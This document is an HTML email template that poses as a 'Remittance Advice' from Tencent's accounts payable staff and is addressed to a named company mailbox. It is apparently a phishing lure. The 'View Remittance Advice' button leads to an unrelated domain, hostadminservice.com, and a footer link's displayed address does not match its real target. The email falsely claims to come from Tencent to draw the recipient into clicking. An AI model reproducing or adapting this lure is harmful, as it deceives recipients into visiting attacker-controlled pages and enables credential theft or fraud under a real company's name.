<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Remittance Advice - Download Link</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f9f9f9;
    }
    .container {
      max-width: 600px;
      margin: 40px auto;
      background-color: #ffffff;
      border-radius: 8px;
      overflow: hidden;
      border: 1px solid #e0e0e0;
    }
    .header {
      background-color: #2e7d32;
      padding: 20px;
      text-align: center;
      color: white;
    }
    .header h1 {
      font-size: 24px;
      margin: 0;
    }
    .content {
      padding: 30px;
      color: #333;
    }
    .content p {
      font-size: 14px;
      line-height: 1.8;
    }
    .cta-button {
      display: inline-block;
      padding: 12px 20px;
      background-color: #2e7d32;
      color: #ffffff;
      text-decoration: none;
      border-radius: 5px;
      font-size: 14px;
      margin-top: 20px;
    }
    .footer {
      background-color: #f4f4f4;
      padding: 20px;
      font-size: 12px;
      color: #666;
      text-align: center;
      border-top: 1px solid #ddd;
    }
  </style>
</head>
<body style="font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f9f9f9">
  <div style="max-width: 600px;
      margin: 40px auto;
      background-color: #ffffff;
      border-radius: 8px;
      overflow: hidden;
      border: 1px solid #e0e0e0" class="container">
    <!-- Header Section -->
    <div style="background-color: #2e7d32;
      padding: 20px;
      text-align: center;
      color: white" class="header">
      <h1 style="font-size: 24px;
      margin: 0">Remittance Advice</h1>
    </div>
    
    <!-- Email Content -->
    <div style="padding: 30px;
      color: #333" class="content">
      <p style="font-size: 14px;
      line-height: 1.8">Dear marketing@moderndatasolusi.com,</p>
      <p style="font-size: 14px;
      line-height: 1.8">Please find the remittance advice for your reference using the link below:</p>
      
      <p style="font-size: 14px;
      line-height: 1.8; text-align: center;">
        <a style="display: inline-block;
      padding: 12px 20px;
      background-color: #2e7d32;
      color: #ffffff;
      text-decoration: none;
      border-radius: 5px;
      font-size: 14px;
      margin-top: 20px" class="cta-button" href="https://hostadminservice.com/">View Remittance Advice</a>
      </p>
      
      <p style="font-size: 14px;
      line-height: 1.8">If you have any questions or require further clarification, feel free to contact us.</p>
      
      <p style="font-size: 14px;
      line-height: 1.8">Best regards,</p>
      <p style="font-size: 14px;
      line-height: 1.8">
        Helena Mccall<br />
        Accounts Payables <br />
        Tencent <br />
        Accounts-payables@tencent.com | 805-385-3055</p>
    </div>

    <!-- Footer Section -->
    <div style="background-color: #f4f4f4;
      padding: 20px;
      font-size: 12px;
      color: #666;
      text-align: center;
      border-top: 1px solid #ddd" class="footer">
      <p>This is an automated email. Please do not reply to this message..</p>
      <p>If you need assistance, contact us at <a href="mailto:support@yourcompany.com" style="color: #2e7d32; text-decoration: none;">support@tencent.com</a>.</p>
      <p>© 2025 . All rights reserved.</p>
    </div>
  </div>
</body>
</html>